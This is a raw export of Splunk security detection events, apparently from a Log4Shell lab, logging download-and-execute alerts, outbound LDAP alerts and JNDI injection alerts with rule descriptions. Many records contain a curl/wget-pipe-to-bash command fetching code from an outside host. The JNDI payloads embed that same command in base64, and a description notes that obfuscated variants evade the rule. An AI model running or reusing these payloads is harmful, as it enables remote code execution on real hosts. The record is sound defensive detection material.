annotations.kill_chain_phases="Exploitation", annotations.mitre_attack="T1105", count="1", dest="sysmonlinux-jhernandez-16155-1604", firstTime="1642638101", info_max_time="+Infinity", info_min_time="0.000", lastTime="2022-01-20T00:21:41", parent_process_id="7756", parent_process_name="-", process="/bin/sh -c (curl http://8.8.8.8:80/wp-content/themes/twentythirteen/m8 || wget -qO - http://8.8.8.8:80/wp-content/themes/twentythirteen/m8)|bash", process_id="8018", process_name="dash", risk_message="An instance of dash was identified on endpoint sysmonlinux-jhernandez-16155-1604 attempting to download a remote file and run it with bash.", risk_object="ubuntu", risk_object_type="user", risk_score="80.0", savedsearch_description="The following analytic identifies the use of wget on Linux or MacOS attempting to download a file from a remote source and pipe it to bash. This is typically found with coinminers and most recently with CVE-2021-44228, a vulnerability in Log4j.", threat_object="dash", threat_object_type="process", user="ubuntu" 1642640915, search_name="ESCU - Wget Download and Bash Execution - Rule", analyticstories="Ingress Tool Transfer", analyticstories="Log4Shell CVE-2021-44228", annotations="{\"analytic_story\":[\"Ingress Tool Transfer\",\"Log4Shell CVE-2021-44228\"],\"context\":[\"Source:Endpoint\",\"Stage:Defense Evasion\"],\"cve\":[\"CVE-2021-44228\"],\"kill_chain_phases\":[\"Exploitation\"],\"mitre_attack\":[\"T1105\"],\"observable\":[]}", annotations._all="Exploitation", annotations._all="Log4Shell CVE-2021-44228", annotations._all="Source:Endpoint", annotations._all="CVE-2021-44228", annotations._all="Ingress Tool Transfer", annotations._all="T1105", annotations._all="Stage:Defense Evasion", annotations._frameworks="analytic_story", annotations._frameworks="context", annotations._frameworks="cve", annotations._frameworks="kill_chain_phases", annotations._frameworks="mitre_attack", annotations.analytic_story="Ingress Tool Transfer", 
annotations.analytic_story="Log4Shell CVE-2021-44228", annotations.context="Source:Endpoint", annotations.context="Stage:Defense Evasion", annotations.cve="CVE-2021-44228", annotations.kill_chain_phases="Exploitation", annotations.mitre_attack="T1105", count="1", dest="sysmonlinux-jhernandez-16155-1604", firstTime="1642633814", info_max_time="+Infinity", info_min_time="0.000", lastTime="2022-01-19T23:10:14", parent_process_id="7756", parent_process_name="-", process="/bin/sh -c (curl http://8.8.8.8:80/wp-content/themes/twentythirteen/m8 || wget -qO - http://8.8.8.8:80/wp-content/themes/twentythirteen/m8)|bash", process_id="7877", process_name="dash", risk_message="An instance of dash was identified on endpoint sysmonlinux-jhernandez-16155-1604 attempting to download a remote file and run it with bash.", risk_object="sysmonlinux-jhernandez-16155-1604", risk_object_type="system", risk_score="80.0", savedsearch_description="The following analytic identifies the use of wget on Linux or MacOS attempting to download a file from a remote source and pipe it to bash. 
This is typically found with coinminers and most recently with CVE-2021-44228, a vulnerability in Log4j.", threat_object="dash", threat_object_type="process", user="ubuntu" 1642640915, search_name="ESCU - Wget Download and Bash Execution - Rule", analyticstories="Ingress Tool Transfer", analyticstories="Log4Shell CVE-2021-44228", annotations="{\"analytic_story\":[\"Ingress Tool Transfer\",\"Log4Shell CVE-2021-44228\"],\"context\":[\"Source:Endpoint\",\"Stage:Defense Evasion\"],\"cve\":[\"CVE-2021-44228\"],\"kill_chain_phases\":[\"Exploitation\"],\"mitre_attack\":[\"T1105\"],\"observable\":[]}", annotations._all="Exploitation", annotations._all="Log4Shell CVE-2021-44228", annotations._all="Source:Endpoint", annotations._all="CVE-2021-44228", annotations._all="Ingress Tool Transfer", annotations._all="T1105", annotations._all="Stage:Defense Evasion", annotations._frameworks="analytic_story", annotations._frameworks="context", annotations._frameworks="cve", annotations._frameworks="kill_chain_phases", annotations._frameworks="mitre_attack", annotations.analytic_story="Ingress Tool Transfer", annotations.analytic_story="Log4Shell CVE-2021-44228", annotations.context="Source:Endpoint", annotations.context="Stage:Defense Evasion", annotations.cve="CVE-2021-44228", annotations.kill_chain_phases="Exploitation", annotations.mitre_attack="T1105", count="1", dest="sysmonlinux-jhernandez-16155-1604", firstTime="1642633814", info_max_time="+Infinity", info_min_time="0.000", lastTime="2022-01-19T23:10:14", parent_process_id="7756", parent_process_name="-", process="/bin/sh -c (curl http://8.8.8.8:80/wp-content/themes/twentythirteen/m8 || wget -qO - http://8.8.8.8:80/wp-content/themes/twentythirteen/m8)|bash", process_id="7877", process_name="dash", risk_message="An instance of dash was identified on endpoint sysmonlinux-jhernandez-16155-1604 attempting to download a remote file and run it with bash.", risk_object="ubuntu", risk_object_type="user", risk_score="80.0", 
savedsearch_description="The following analytic identifies the use of wget on Linux or MacOS attempting to download a file from a remote source and pipe it to bash. This is typically found with coinminers and most recently with CVE-2021-44228, a vulnerability in Log4j.", threat_object="dash", threat_object_type="process", user="ubuntu" 1642640915, search_name="ESCU - Wget Download and Bash Execution - Rule", analyticstories="Ingress Tool Transfer", analyticstories="Log4Shell CVE-2021-44228", annotations="{\"analytic_story\":[\"Ingress Tool Transfer\",\"Log4Shell CVE-2021-44228\"],\"context\":[\"Source:Endpoint\",\"Stage:Defense Evasion\"],\"cve\":[\"CVE-2021-44228\"],\"kill_chain_phases\":[\"Exploitation\"],\"mitre_attack\":[\"T1105\"],\"observable\":[]}", annotations._all="Exploitation", annotations._all="Log4Shell CVE-2021-44228", annotations._all="Source:Endpoint", annotations._all="CVE-2021-44228", annotations._all="Ingress Tool Transfer", annotations._all="T1105", annotations._all="Stage:Defense Evasion", annotations._frameworks="analytic_story", annotations._frameworks="context", annotations._frameworks="cve", annotations._frameworks="kill_chain_phases", annotations._frameworks="mitre_attack", annotations.analytic_story="Ingress Tool Transfer", annotations.analytic_story="Log4Shell CVE-2021-44228", annotations.context="Source:Endpoint", annotations.context="Stage:Defense Evasion", annotations.cve="CVE-2021-44228", annotations.kill_chain_phases="Exploitation", annotations.mitre_attack="T1105", count="1", dest="sysmonlinux-jhernandez-16155-1604", firstTime="1642633812", info_max_time="+Infinity", info_min_time="0.000", lastTime="2022-01-19T23:10:12", parent_process_id="7756", parent_process_name="-", process="/bin/sh -c (curl http://8.8.8.8:80/wp-content/themes/twentythirteen/m8 || wget -qO - http://8.8.8.8:80/wp-content/themes/twentythirteen/m8)|bash", process_id="7870", process_name="dash", risk_message="An instance of dash was identified on endpoint 
sysmonlinux-jhernandez-16155-1604 attempting to download a remote file and run it with bash.", risk_object="sysmonlinux-jhernandez-16155-1604", risk_object_type="system", risk_score="80.0", savedsearch_description="The following analytic identifies the use of wget on Linux or MacOS attempting to download a file from a remote source and pipe it to bash. This is typically found with coinminers and most recently with CVE-2021-44228, a vulnerability in Log4j.", threat_object="dash", threat_object_type="process", user="ubuntu" 1642640915, search_name="ESCU - Wget Download and Bash Execution - Rule", analyticstories="Ingress Tool Transfer", analyticstories="Log4Shell CVE-2021-44228", annotations="{\"analytic_story\":[\"Ingress Tool Transfer\",\"Log4Shell CVE-2021-44228\"],\"context\":[\"Source:Endpoint\",\"Stage:Defense Evasion\"],\"cve\":[\"CVE-2021-44228\"],\"kill_chain_phases\":[\"Exploitation\"],\"mitre_attack\":[\"T1105\"],\"observable\":[]}", annotations._all="Exploitation", annotations._all="Log4Shell CVE-2021-44228", annotations._all="Source:Endpoint", annotations._all="CVE-2021-44228", annotations._all="Ingress Tool Transfer", annotations._all="T1105", annotations._all="Stage:Defense Evasion", annotations._frameworks="analytic_story", annotations._frameworks="context", annotations._frameworks="cve", annotations._frameworks="kill_chain_phases", annotations._frameworks="mitre_attack", annotations.analytic_story="Ingress Tool Transfer", annotations.analytic_story="Log4Shell CVE-2021-44228", annotations.context="Source:Endpoint", annotations.context="Stage:Defense Evasion", annotations.cve="CVE-2021-44228", annotations.kill_chain_phases="Exploitation", annotations.mitre_attack="T1105", count="1", dest="sysmonlinux-jhernandez-16155-1604", firstTime="1642633812", info_max_time="+Infinity", info_min_time="0.000", lastTime="2022-01-19T23:10:12", parent_process_id="7756", parent_process_name="-", process="/bin/sh -c (curl 
http://8.8.8.8:80/wp-content/themes/twentythirteen/m8 || wget -qO - http://8.8.8.8:80/wp-content/themes/twentythirteen/m8)|bash", process_id="7870", process_name="dash", risk_message="An instance of dash was identified on endpoint sysmonlinux-jhernandez-16155-1604 attempting to download a remote file and run it with bash.", risk_object="ubuntu", risk_object_type="user", risk_score="80.0", savedsearch_description="The following analytic identifies the use of wget on Linux or MacOS attempting to download a file from a remote source and pipe it to bash. This is typically found with coinminers and most recently with CVE-2021-44228, a vulnerability in Log4j.", threat_object="dash", threat_object_type="process", user="ubuntu" 1642640915, search_name="ESCU - Wget Download and Bash Execution - Rule", analyticstories="Ingress Tool Transfer", analyticstories="Log4Shell CVE-2021-44228", annotations="{\"analytic_story\":[\"Ingress Tool Transfer\",\"Log4Shell CVE-2021-44228\"],\"context\":[\"Source:Endpoint\",\"Stage:Defense Evasion\"],\"cve\":[\"CVE-2021-44228\"],\"kill_chain_phases\":[\"Exploitation\"],\"mitre_attack\":[\"T1105\"],\"observable\":[]}", annotations._all="Exploitation", annotations._all="Log4Shell CVE-2021-44228", annotations._all="Source:Endpoint", annotations._all="CVE-2021-44228", annotations._all="Ingress Tool Transfer", annotations._all="T1105", annotations._all="Stage:Defense Evasion", annotations._frameworks="analytic_story", annotations._frameworks="context", annotations._frameworks="cve", annotations._frameworks="kill_chain_phases", annotations._frameworks="mitre_attack", annotations.analytic_story="Ingress Tool Transfer", annotations.analytic_story="Log4Shell CVE-2021-44228", annotations.context="Source:Endpoint", annotations.context="Stage:Defense Evasion", annotations.cve="CVE-2021-44228", annotations.kill_chain_phases="Exploitation", annotations.mitre_attack="T1105", count="1", dest="sysmonlinux-jhernandez-16155-1604", firstTime="1642631700", 
info_max_time="+Infinity", info_min_time="0.000", lastTime="2022-01-19T22:35:00", parent_process_id="7756", parent_process_name="-", process="/bin/sh -c (curl http://8.8.8.8:80/wp-content/themes/twentythirteen/m8 || wget -qO - http://8.8.8.8:80/wp-content/themes/twentythirteen/m8)|bash", process_id="7798", process_name="dash", risk_message="An instance of dash was identified on endpoint sysmonlinux-jhernandez-16155-1604 attempting to download a remote file and run it with bash.", risk_object="sysmonlinux-jhernandez-16155-1604", risk_object_type="system", risk_score="80.0", savedsearch_description="The following analytic identifies the use of wget on Linux or MacOS attempting to download a file from a remote source and pipe it to bash. This is typically found with coinminers and most recently with CVE-2021-44228, a vulnerability in Log4j.", threat_object="dash", threat_object_type="process", user="ubuntu" 1642640915, search_name="ESCU - Wget Download and Bash Execution - Rule", analyticstories="Ingress Tool Transfer", analyticstories="Log4Shell CVE-2021-44228", annotations="{\"analytic_story\":[\"Ingress Tool Transfer\",\"Log4Shell CVE-2021-44228\"],\"context\":[\"Source:Endpoint\",\"Stage:Defense Evasion\"],\"cve\":[\"CVE-2021-44228\"],\"kill_chain_phases\":[\"Exploitation\"],\"mitre_attack\":[\"T1105\"],\"observable\":[]}", annotations._all="Exploitation", annotations._all="Log4Shell CVE-2021-44228", annotations._all="Source:Endpoint", annotations._all="CVE-2021-44228", annotations._all="Ingress Tool Transfer", annotations._all="T1105", annotations._all="Stage:Defense Evasion", annotations._frameworks="analytic_story", annotations._frameworks="context", annotations._frameworks="cve", annotations._frameworks="kill_chain_phases", annotations._frameworks="mitre_attack", annotations.analytic_story="Ingress Tool Transfer", annotations.analytic_story="Log4Shell CVE-2021-44228", annotations.context="Source:Endpoint", annotations.context="Stage:Defense Evasion", 
annotations.cve="CVE-2021-44228", annotations.kill_chain_phases="Exploitation", annotations.mitre_attack="T1105", count="1", dest="sysmonlinux-jhernandez-16155-1604", firstTime="1642631700", info_max_time="+Infinity", info_min_time="0.000", lastTime="2022-01-19T22:35:00", parent_process_id="7756", parent_process_name="-", process="/bin/sh -c (curl http://8.8.8.8:80/wp-content/themes/twentythirteen/m8 || wget -qO - http://8.8.8.8:80/wp-content/themes/twentythirteen/m8)|bash", process_id="7798", process_name="dash", risk_message="An instance of dash was identified on endpoint sysmonlinux-jhernandez-16155-1604 attempting to download a remote file and run it with bash.", risk_object="ubuntu", risk_object_type="user", risk_score="80.0", savedsearch_description="The following analytic identifies the use of wget on Linux or MacOS attempting to download a file from a remote source and pipe it to bash. This is typically found with coinminers and most recently with CVE-2021-44228, a vulnerability in Log4j.", threat_object="dash", threat_object_type="process", user="ubuntu" 1642640653, search_name="ESCU - Detect Outbound LDAP Traffic - Rule", analyticstories="Log4Shell CVE-2021-44228", annotations="{\"analytic_story\":[\"Log4Shell CVE-2021-44228\"],\"cis20\":[\"CIS 12\",\"CIS 13\"],\"context\":[\"Source:Endpoint\",\"Stage:Initial Access\"],\"cve\":[\"CVE-2021-44228\"],\"kill_chain_phases\":[\"Command and Control\",\"Actions on Objectives\"],\"mitre_attack\":[\"T1190\",\"T1059\"],\"nist\":[\"PR.DS\",\"PR.PT\",\"DE.AE\",\"DE.CM\"],\"observable\":[]}", annotations._all="Source:Endpoint", annotations._all="Stage:Initial Access", annotations._all="T1059", annotations._all="PR.PT", annotations._all="DE.AE", annotations._all="Command and Control", annotations._all="CIS 12", annotations._all="Log4Shell CVE-2021-44228", annotations._all="CIS 13", annotations._all="PR.DS", annotations._all="DE.CM", annotations._all="T1190", annotations._all="CVE-2021-44228", annotations._all="Actions 
on Objectives", annotations._frameworks="analytic_story", annotations._frameworks="cis20", annotations._frameworks="context", annotations._frameworks="cve", annotations._frameworks="kill_chain_phases", annotations._frameworks="mitre_attack", annotations._frameworks="nist", annotations.analytic_story="Log4Shell CVE-2021-44228", annotations.cis20="CIS 12", annotations.cis20="CIS 13", annotations.context="Source:Endpoint", annotations.context="Stage:Initial Access", annotations.cve="CVE-2021-44228", annotations.kill_chain_phases="Command and Control", annotations.kill_chain_phases="Actions on Objectives", annotations.mitre_attack="T1190", annotations.mitre_attack="T1059", annotations.nist="PR.DS", annotations.nist="PR.PT", annotations.nist="DE.AE", annotations.nist="DE.CM", dest_ip="0:0:0:0:0:ffff:a00:110", earliest_time="2022-01-19T22:34:59", info_max_time="+Infinity", info_min_time="0.000", latest_time="2022-01-20T00:21:41", risk_message="An outbound LDAP connection from 0:0:0:0:0:ffff:a00:114 in your infrastructure connecting to dest ip 0:0:0:0:0:ffff:a00:110", risk_object="0:0:0:0:0:ffff:a00:110", risk_object_type="system", risk_score="56.0", savedsearch_description="Malicious actors often abuse misconfigured LDAP servers or applications that use the LDAP servers in organizations. Outbound LDAP traffic should not be allowed outbound through your perimeter firewall. 
This search will help determine if you have any LDAP connections to IP addresses outside of private (RFC1918) address space. Note that in this event both endpoints are IPv4-mapped IPv6 addresses (0:0:0:0:0:ffff:a00:114 is 10.0.1.20 and 0:0:0:0:0:ffff:a00:110 is 10.0.1.16, both inside RFC1918 space); the private-range exclusion does not appear to normalize this notation, so hits in this form need manual review rather than being treated as a confirmed perimeter egress.", src_ip="0:0:0:0:0:ffff:a00:114" 1642640651, search_name="ESCU - Log4Shell JNDI Payload Injection Attempt - Rule", action="Bad Request", analyticstories="Log4Shell CVE-2021-44228", annotations="{\"analytic_story\":[\"Log4Shell CVE-2021-44228\"],\"cis20\":[\"CIS 3\",\"CIS 5\",\"CIS 16\"],\"context\":[\"Source:Application Log\",\"Stage:Execution\"],\"cve\":[\"CVE-2021-44228\"],\"kill_chain_phases\":[\"Reconnaissance\",\"Exploitation\"],\"mitre_attack\":[\"T1190\"],\"nist\":[\"DE.CM\"],\"observable\":[]}", annotations._all="Source:Application Log", annotations._all="CIS 16", annotations._all="CVE-2021-44228", annotations._all="Exploitation", annotations._all="Stage:Execution", annotations._all="CIS 3", annotations._all="Reconnaissance", annotations._all="T1190", annotations._all="Log4Shell CVE-2021-44228", annotations._all="DE.CM", annotations._all="CIS 5", annotations._frameworks="analytic_story", annotations._frameworks="cis20", annotations._frameworks="context", annotations._frameworks="cve", annotations._frameworks="kill_chain_phases", annotations._frameworks="mitre_attack", annotations._frameworks="nist", annotations.analytic_story="Log4Shell CVE-2021-44228", annotations.cis20="CIS 3", annotations.cis20="CIS 5", annotations.cis20="CIS 16", annotations.context="Source:Application Log", annotations.context="Stage:Execution", annotations.cve="CVE-2021-44228", annotations.kill_chain_phases="Reconnaissance", annotations.kill_chain_phases="Exploitation", annotations.mitre_attack="T1190", annotations.nist="DE.CM", category="application/json", count="2", dest="10.0.1.21", dest_port="80", http_content_type="application/json", http_method="GET", http_referrer="unknown", http_user_agent="curl/7.79.1", info_max_time="+Infinity", info_min_time="0.000", risk_message="CVE-2021-44228 Log4Shell triggered for host 10.0.1.21", risk_object="10.0.1.21", 
risk_object_type="system", risk_score="15.0", savedsearch_description="CVE-2021-44228 Log4Shell payloads can be injected via various methods, but one of the most common injection vectors is via Web calls. Many of the vulnerable Java web applications that use log4j have a web component and are especially targeted by this injection, specifically projects like Apache Struts, Flink, Druid, and Solr. The exploit is triggered by a JNDI/LDAP lookup in the log4j package; its invocation is similar to `${jndi:ldap://PAYLOAD_INJECTED}`, and when executed against vulnerable web applications the invocation can be seen in various parts of web logs. Specifically, it has been successfully exploited via headers like X-Forwarded-For, User-Agent, Referer, and X-Api-Version. In this detection we first limit the scope of our search to the Web Datamodel and use the `| from datamodel` function to benefit from schema accelerated searching capabilities, mainly because the second part of the detection is pretty heavy: it runs a regex across all _raw events that looks for the `${jndi:ldap://` pattern across all potential web fields available in the raw data, like HTTP headers for example. Because the match is on that literal string, payloads using other JNDI schemes or an obfuscated `jndi` keyword will not be caught by this rule. 
If you see results for this detection, it means that there was an injection attempt, which could be reconnaissance activity or a valid exploitation attempt, but this does not necessarily mean that the host was successfully exploited; correlate with outbound LDAP/JNDI callbacks and follow-on process activity on the target host to confirm.", site="localhost", src="${jndi:ldap://10.0.1.16:1389/Basic/Command/Base64/KGN1cmwgaHR0cDovLzguOC44Ljg6ODAvd3AtY29udGVudC90aGVtZXMvdHdlbnR5dGhpcnRlZW4vbTggfHwgd2dldCAtcU8gLSBodHRwOi8vOC44LjguODo4MC93cC1jb250ZW50L3RoZW1lcy90d2VudHl0aGlydGVlbi9tOCl8YmFzaA==}", url="http://10.0.1.21:80/", url_domain="10.0.1.21", user="unknown" 1642640653, search_name="ESCU - Detect Outbound LDAP Traffic - Rule", analyticstories="Log4Shell CVE-2021-44228", annotations="{\"analytic_story\":[\"Log4Shell CVE-2021-44228\"],\"cis20\":[\"CIS 12\",\"CIS 13\"],\"context\":[\"Source:Endpoint\",\"Stage:Initial Access\"],\"cve\":[\"CVE-2021-44228\"],\"kill_chain_phases\":[\"Command and Control\",\"Actions on Objectives\"],\"mitre_attack\":[\"T1190\",\"T1059\"],\"nist\":[\"PR.DS\",\"PR.PT\",\"DE.AE\",\"DE.CM\"],\"observable\":[]}", annotations._all="Source:Endpoint", annotations._all="Stage:Initial Access", annotations._all="T1059", annotations._all="PR.PT", annotations._all="DE.AE", annotations._all="Command and Control", annotations._all="CIS 12", annotations._all="Log4Shell CVE-2021-44228", annotations._all="CIS 13", annotations._all="PR.DS", annotations._all="DE.CM", annotations._all="T1190", annotations._all="CVE-2021-44228", annotations._all="Actions on Objectives", annotations._frameworks="analytic_story", annotations._frameworks="cis20", annotations._frameworks="context", annotations._frameworks="cve", annotations._frameworks="kill_chain_phases", annotations._frameworks="mitre_attack", annotations._frameworks="nist", annotations.analytic_story="Log4Shell CVE-2021-44228", annotations.cis20="CIS 12", annotations.cis20="CIS 13", annotations.context="Source:Endpoint", annotations.context="Stage:Initial Access", annotations.cve="CVE-2021-44228", 
annotations.kill_chain_phases="Command and Control", annotations.kill_chain_phases="Actions on Objectives", annotations.mitre_attack="T1190", annotations.mitre_attack="T1059", annotations.nist="PR.DS", annotations.nist="PR.PT", annotations.nist="DE.AE", annotations.nist="DE.CM", dest_ip="0:0:0:0:0:ffff:a00:110", earliest_time="2022-01-19T22:34:59", info_max_time="+Infinity", info_min_time="0.000", latest_time="2022-01-20T00:21:41", risk_message="An outbound LDAP connection from 0:0:0:0:0:ffff:a00:114 in your infrastructure connecting to dest ip 0:0:0:0:0:ffff:a00:110", risk_object="0:0:0:0:0:ffff:a00:114", risk_object_type="system", risk_score="56.0", savedsearch_description="Malicious actors often abuse misconfigured LDAP servers or applications that use the LDAP servers in organizations. LDAP traffic should not be allowed outbound through your perimeter firewall. This search will help determine if you have any LDAP connections to IP addresses outside of private (RFC1918) address space. Note that in this event both endpoints are IPv4-mapped IPv6 addresses (0:0:0:0:0:ffff:a00:114 is 10.0.1.20 and 0:0:0:0:0:ffff:a00:110 is 10.0.1.16, both inside RFC1918 space); the private-range exclusion does not appear to normalize this notation, so hits in this form need manual review rather than being treated as a confirmed perimeter egress.", src_ip="0:0:0:0:0:ffff:a00:114" 1642640651, search_name="ESCU - Log4Shell JNDI Payload Injection Attempt - Rule", action="Bad Request", analyticstories="Log4Shell CVE-2021-44228", annotations="{\"analytic_story\":[\"Log4Shell CVE-2021-44228\"],\"cis20\":[\"CIS 3\",\"CIS 5\",\"CIS 16\"],\"context\":[\"Source:Application Log\",\"Stage:Execution\"],\"cve\":[\"CVE-2021-44228\"],\"kill_chain_phases\":[\"Reconnaissance\",\"Exploitation\"],\"mitre_attack\":[\"T1190\"],\"nist\":[\"DE.CM\"],\"observable\":[]}", annotations._all="Source:Application Log", annotations._all="CIS 16", annotations._all="CVE-2021-44228", annotations._all="Exploitation", annotations._all="Stage:Execution", annotations._all="CIS 3", annotations._all="Reconnaissance", annotations._all="T1190", annotations._all="Log4Shell CVE-2021-44228", annotations._all="DE.CM", annotations._all="CIS 5", annotations._frameworks="analytic_story", annotations._frameworks="cis20", annotations._frameworks="context", 
annotations._frameworks="cve", annotations._frameworks="kill_chain_phases", annotations._frameworks="mitre_attack", annotations._frameworks="nist", annotations.analytic_story="Log4Shell CVE-2021-44228", annotations.cis20="CIS 3", annotations.cis20="CIS 5", annotations.cis20="CIS 16", annotations.context="Source:Application Log", annotations.context="Stage:Execution", annotations.cve="CVE-2021-44228", annotations.kill_chain_phases="Reconnaissance", annotations.kill_chain_phases="Exploitation", annotations.mitre_attack="T1190", annotations.nist="DE.CM", category="application/json", count="2", dest="10.0.1.21", dest_port="80", http_content_type="application/json", http_method="GET", http_referrer="unknown", http_user_agent="curl/7.79.1", info_max_time="+Infinity", info_min_time="0.000", risk_message="CVE-2021-44228 Log4Shell triggered for host 10.0.1.21", risk_object="unknown", risk_object_type="user", risk_score="15.0", savedsearch_description="CVE-2021-44228 Log4Shell payloads can be injected via various methods, but one of the most common injection vectors is via Web calls. Many of the vulnerable Java web applications that use log4j have a web component and are especially targeted by this injection, specifically projects like Apache Struts, Flink, Druid, and Solr. The exploit is triggered by a JNDI/LDAP lookup in the log4j package; its invocation is similar to `${jndi:ldap://PAYLOAD_INJECTED}`, and when executed against vulnerable web applications the invocation can be seen in various parts of web logs. Specifically, it has been successfully exploited via headers like X-Forwarded-For, User-Agent, Referer, and X-Api-Version. 
In this detection we first limit the scope of our search to the Web Datamodel and use the `| from datamodel` function to benefit from schema accelerated searching capabilities, mainly because the second part of the detection is pretty heavy: it runs a regex across all _raw events that looks for the `${jndi:ldap://` pattern across all potential web fields available in the raw data, like HTTP headers for example. Because the match is on that literal string, payloads using other JNDI schemes or an obfuscated `jndi` keyword will not be caught by this rule. If you see results for this detection, it means that there was an injection attempt, which could be reconnaissance activity or a valid exploitation attempt, but this does not necessarily mean that the host was successfully exploited; correlate with outbound LDAP/JNDI callbacks and follow-on process activity on the target host to confirm.", site="localhost", src="${jndi:ldap://10.0.1.16:1389/Basic/Command/Base64/KGN1cmwgaHR0cDovLzguOC44Ljg6ODAvd3AtY29udGVudC90aGVtZXMvdHdlbnR5dGhpcnRlZW4vbTggfHwgd2dldCAtcU8gLSBodHRwOi8vOC44LjguODo4MC93cC1jb250ZW50L3RoZW1lcy90d2VudHl0aGlydGVlbi9tOCl8YmFzaA==}", url="http://10.0.1.21:80/", url_domain="10.0.1.21", user="unknown" 1642640616, search_name="ESCU - Wget Download and Bash Execution - Rule", analyticstories="Ingress Tool Transfer", analyticstories="Log4Shell CVE-2021-44228", annotations="{\"analytic_story\":[\"Ingress Tool Transfer\",\"Log4Shell CVE-2021-44228\"],\"context\":[\"Source:Endpoint\",\"Stage:Defense Evasion\"],\"cve\":[\"CVE-2021-44228\"],\"kill_chain_phases\":[\"Exploitation\"],\"mitre_attack\":[\"T1105\"],\"observable\":[]}", annotations._all="Ingress Tool Transfer", annotations._all="CVE-2021-44228", annotations._all="Stage:Defense Evasion", annotations._all="Source:Endpoint", annotations._all="T1105", annotations._all="Exploitation", annotations._all="Log4Shell CVE-2021-44228", annotations._frameworks="analytic_story", annotations._frameworks="context", annotations._frameworks="cve", annotations._frameworks="kill_chain_phases", annotations._frameworks="mitre_attack", annotations.analytic_story="Ingress Tool Transfer", annotations.analytic_story="Log4Shell CVE-2021-44228", 
annotations.context="Source:Endpoint", annotations.context="Stage:Defense Evasion", annotations.cve="CVE-2021-44228", annotations.kill_chain_phases="Exploitation", annotations.mitre_attack="T1105", count="1", dest="sysmonlinux-jhernandez-16155-1604", firstTime="1642638231", info_max_time="+Infinity", info_min_time="0.000", lastTime="2022-01-20T00:23:51", parent_process_id="8018", parent_process_name="dash", process="wget -qO - http://8.8.8.8:80/wp-content/themes/twentythirteen/m8", process_id="8020", process_name="wget", risk_message="An instance of wget was identified on endpoint sysmonlinux-jhernandez-16155-1604 attempting to download a remote file and run it with bash.", risk_object="sysmonlinux-jhernandez-16155-1604", risk_object_type="system", risk_score="80.0", savedsearch_description="The following analytic identifies the use of wget on Linux or MacOS attempting to download a file from a remote source and pipe it to bash. This is typically found with coinminers and most recently with CVE-2021-44228, a vulnerability in Log4j.", threat_object="wget", threat_object_type="process", user="ubuntu" 1642640616, search_name="ESCU - Wget Download and Bash Execution - Rule", analyticstories="Ingress Tool Transfer", analyticstories="Log4Shell CVE-2021-44228", annotations="{\"analytic_story\":[\"Ingress Tool Transfer\",\"Log4Shell CVE-2021-44228\"],\"context\":[\"Source:Endpoint\",\"Stage:Defense Evasion\"],\"cve\":[\"CVE-2021-44228\"],\"kill_chain_phases\":[\"Exploitation\"],\"mitre_attack\":[\"T1105\"],\"observable\":[]}", annotations._all="Ingress Tool Transfer", annotations._all="CVE-2021-44228", annotations._all="Stage:Defense Evasion", annotations._all="Source:Endpoint", annotations._all="T1105", annotations._all="Exploitation", annotations._all="Log4Shell CVE-2021-44228", annotations._frameworks="analytic_story", annotations._frameworks="context", annotations._frameworks="cve", annotations._frameworks="kill_chain_phases", annotations._frameworks="mitre_attack", 
annotations.analytic_story="Ingress Tool Transfer", annotations.analytic_story="Log4Shell CVE-2021-44228", annotations.context="Source:Endpoint", annotations.context="Stage:Defense Evasion", annotations.cve="CVE-2021-44228", annotations.kill_chain_phases="Exploitation", annotations.mitre_attack="T1105", count="1", dest="sysmonlinux-jhernandez-16155-1604", firstTime="1642638231", info_max_time="+Infinity", info_min_time="0.000", lastTime="2022-01-20T00:23:51", parent_process_id="8018", parent_process_name="dash", process="wget -qO - http://8.8.8.8:80/wp-content/themes/twentythirteen/m8", process_id="8020", process_name="wget", risk_message="An instance of wget was identified on endpoint sysmonlinux-jhernandez-16155-1604 attempting to download a remote file and run it with bash.", risk_object="ubuntu", risk_object_type="user", risk_score="80.0", savedsearch_description="The following analytic identifies the use of wget on Linux or MacOS attempting to download a file from a remote source and pipe it to bash. 
This is typically found with coinminers and most recently with CVE-2021-44228, a vulnerability in Log4j.", threat_object="wget", threat_object_type="process", user="ubuntu" 1642640616, search_name="ESCU - Wget Download and Bash Execution - Rule", analyticstories="Ingress Tool Transfer", analyticstories="Log4Shell CVE-2021-44228", annotations="{\"analytic_story\":[\"Ingress Tool Transfer\",\"Log4Shell CVE-2021-44228\"],\"context\":[\"Source:Endpoint\",\"Stage:Defense Evasion\"],\"cve\":[\"CVE-2021-44228\"],\"kill_chain_phases\":[\"Exploitation\"],\"mitre_attack\":[\"T1105\"],\"observable\":[]}", annotations._all="Ingress Tool Transfer", annotations._all="CVE-2021-44228", annotations._all="Stage:Defense Evasion", annotations._all="Source:Endpoint", annotations._all="T1105", annotations._all="Exploitation", annotations._all="Log4Shell CVE-2021-44228", annotations._frameworks="analytic_story", annotations._frameworks="context", annotations._frameworks="cve", annotations._frameworks="kill_chain_phases", annotations._frameworks="mitre_attack", annotations.analytic_story="Ingress Tool Transfer", annotations.analytic_story="Log4Shell CVE-2021-44228", annotations.context="Source:Endpoint", annotations.context="Stage:Defense Evasion", annotations.cve="CVE-2021-44228", annotations.kill_chain_phases="Exploitation", annotations.mitre_attack="T1105", count="1", dest="sysmonlinux-jhernandez-16155-1604", firstTime="1642633944", info_max_time="+Infinity", info_min_time="0.000", lastTime="2022-01-19T23:12:24", parent_process_id="7877", parent_process_name="dash", process="wget -qO - http://8.8.8.8:80/wp-content/themes/twentythirteen/m8", process_id="7879", process_name="wget", risk_message="An instance of wget was identified on endpoint sysmonlinux-jhernandez-16155-1604 attempting to download a remote file and run it with bash.", risk_object="sysmonlinux-jhernandez-16155-1604", risk_object_type="system", risk_score="80.0", savedsearch_description="The following analytic identifies 
